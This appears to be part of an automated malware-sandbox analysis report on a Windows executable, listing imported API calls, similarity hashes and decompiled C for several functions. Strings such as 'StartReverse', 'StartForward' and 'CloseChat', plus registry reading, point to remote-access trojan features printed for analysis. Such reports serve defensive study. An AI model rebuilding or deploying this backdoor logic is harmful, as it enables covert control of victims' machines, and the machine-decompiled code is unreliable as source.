                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040A3AD
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • #12.WS2_32 ref: 0040A41B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                                                                • atoi.MSVCRT ref: 0040A435
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                                                                • atoi.MSVCRT ref: 0040A479
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                • API String ID: 2416847206-168337528
                                                                                • Opcode ID: 54903d741be3d62d167bfcda20e71c9ca57bccbd701edb3687dbc58f6fe870c6
                                                                                • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                                                                • Opcode Fuzzy Hash: 54903d741be3d62d167bfcda20e71c9ca57bccbd701edb3687dbc58f6fe870c6
                                                                                • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040295E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 167windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 34%
                                                                                			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				int _t29;
				void* _t35;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				intOrPtr _t95;
				void* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t107;

				_t107 = __eflags;
				_t95 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
				_t29 = SetEvent( *(_t95 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t104 = _t101 + 0x24;
				_t97 =  *_t29 - 0x3a;
				if(_t97 == 0) {
					_t35 = E0040180C( &_v28, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t62 = E00406DD9(_t35);
					__eflags = _t62;
					if(_t62 == 0) {
						L12:
						E004017DD( &_v28);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__eflags = 0;
						return 0;
					}
					 *0x41b794 = E00407033(_t62, "DisplayMessage");
					 *0x41b798 = E00407033(_t62, "GetMessage");
					_t41 = E00407033(_t62, "CloseChat");
					_t105 = _t104 + 8;
					 *0x41b79c = _t41;
					 *0x41b790 = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(_t95, 0x74, 0x41b738);
					L10:
					_t63 = HeapCreate(0, 0, 0);
					_t45 =  *0x41b798(_t63,  &_v12);
					__eflags = _t45;
					if(_t45 != 0) {
						_t105 = _t105 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
						E004020C2(_t95, 0x3b, _v12);
						HeapFree(_t63, 0, _v12);
					}
					goto L10;
				}
				_t109 = _t97 != 1;
				if(_t97 != 1) {
					goto L12;
				}
				_t50 = E00412881( &_v92);
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
				_t51 =  *0x41b794(_t50);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_t51 == 0) {
					goto L12;
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
				E00412855( &_v60, _t104 - 0x10,  &_v60);
				E004020C2(_t95, 0x3b, 0x41576c);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}

























                                                                                0x0040295e
                                                                                0x00402967
                                                                                0x00402971
                                                                                0x0040297a
                                                                                0x00402983
                                                                                0x0040299b
                                                                                0x004029ab
                                                                                0x004029ba
                                                                                0x004029c4
                                                                                0x004029c9
                                                                                0x004029cc
                                                                                0x004029cf
                                                                                0x00402a80
                                                                                0x00402a87
                                                                                0x00402a93
                                                                                0x00402a96
                                                                                0x00402a98
                                                                                0x00402b33
                                                                                0x00402b36
                                                                                0x00402b3e
                                                                                0x00402b47
                                                                                0x00402b4f
                                                                                0x00402b53
                                                                                0x00402b53
                                                                                0x00402aaf
                                                                                0x00402abf
                                                                                0x00402ac4
                                                                                0x00402ac9
                                                                                0x00402acc
                                                                                0x00402ad3
                                                                                0x00402adf
                                                                                0x00402ae9
                                                                                0x00402aee
                                                                                0x00402af7
                                                                                0x00402afe
                                                                                0x00402b05
                                                                                0x00402b08
                                                                                0x00402b0a
                                                                                0x00402b17
                                                                                0x00402b21
                                                                                0x00402b2b
                                                                                0x00402b2b
                                                                                0x00000000
                                                                                0x00402b08
                                                                                0x004029d5
                                                                                0x004029d6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004029ec
                                                                                0x004029f5
                                                                                0x004029fc
                                                                                0x00402a08
                                                                                0x00402a10
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a22
                                                                                0x00402a32
                                                                                0x00402a3d
                                                                                0x00402a45
                                                                                0x00000000
                                                                                0x00402a4b
                                                                                0x00402a72
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a78
                                                                                0x00402a60
                                                                                0x00402a6a
                                                                                0x00000000

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                                                                • SetEvent.KERNEL32(?), ref: 0040297A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040299B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                                                                • GetMessageA.USER32 ref: 00402A52
                                                                                • TranslateMessage.USER32(?), ref: 00402A60
                                                                                • DispatchMessageA.USER32 ref: 00402A6A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                                                                • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 1701728818-749203953
                                                                                • Opcode ID: f86dce867839c44f2fe38f0c41830367d02e79be52a79e7338d7ba5c905a58a8
                                                                                • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                                                                • Opcode Fuzzy Hash: f86dce867839c44f2fe38f0c41830367d02e79be52a79e7338d7ba5c905a58a8
                                                                                • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BE34, Relevance: 39.1, APIs: 26, Instructions: 148registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 34%
                                                                                			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				void* _t28;
				long _t29;
				void* _t35;
				char* _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t44;
				void* _t54;
				void* _t56;
				char* _t73;
				void* _t77;
				void* _t79;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t28 = E0040BD9B( &_a4);
				_t79 = _t77 - 0x10 + 0x10;
				_t47 = 0;
				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
				_t90 = _t29;
				if(_t29 != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41bde0, 0x72, "3");
				} else {
					E0040BB20( &_v8, _t90, _v8);
					_pop(_t54);
					_t73 = "0";
					if(_a24 != 0) {
						_t73 = "1";
					}
					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
					_t56 = 0x41b310;
					_t38 =  &_v88;
					L00414176();
					_t39 =  &_v56;
					L00414140();
					_t40 =  &_v40;
					L00414140();
					_t41 =  &_v24;
					L00414140();
					_t42 =  &_v72;
					L00414140();
					_t43 =  &_v104;
					L00414140();
					_t44 =  &_v136;
					L00414140();
					L00414140();
					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					RegCloseKey(_v8);
					_t47 = 1;
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t47;
			}




























                                                                                0x0040be49
                                                                                0x0040be4f
                                                                                0x0040be54
                                                                                0x0040be5a
                                                                                0x0040be67
                                                                                0x0040be6d
                                                                                0x0040be6f
                                                                                0x0040bfea
                                                                                0x0040bff7
                                                                                0x0040be75
                                                                                0x0040be78
                                                                                0x0040be80
                                                                                0x0040be81
                                                                                0x0040be86
                                                                                0x0040be88
                                                                                0x0040be88
                                                                                0x0040beaf
                                                                                0x0040beb5
                                                                                0x0040beca
                                                                                0x0040becf
                                                                                0x0040bed8
                                                                                0x0040bedc
                                                                                0x0040bee5
                                                                                0x0040bee9
                                                                                0x0040bef2
                                                                                0x0040bef6
                                                                                0x0040beff
                                                                                0x0040bf03
                                                                                0x0040bf0c
                                                                                0x0040bf10
                                                                                0x0040bf19
                                                                                0x0040bf20
                                                                                0x0040bf2a
                                                                                0x0040bf39
                                                                                0x0040bf44
                                                                                0x0040bf4d
                                                                                0x0040bf56
                                                                                0x0040bf5f
                                                                                0x0040bf68
                                                                                0x0040bf71
                                                                                0x0040bf7a
                                                                                0x0040bf83
                                                                                0x0040bf8f
                                                                                0x0040bfa0
                                                                                0x0040bfac
                                                                                0x0040bfbd
                                                                                0x0040bfc9
                                                                                0x0040bfd2
                                                                                0x0040bfd8
                                                                                0x0040bfd8
                                                                                0x0040bfff
                                                                                0x0040c00b

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                                                                  • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                                                                  • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
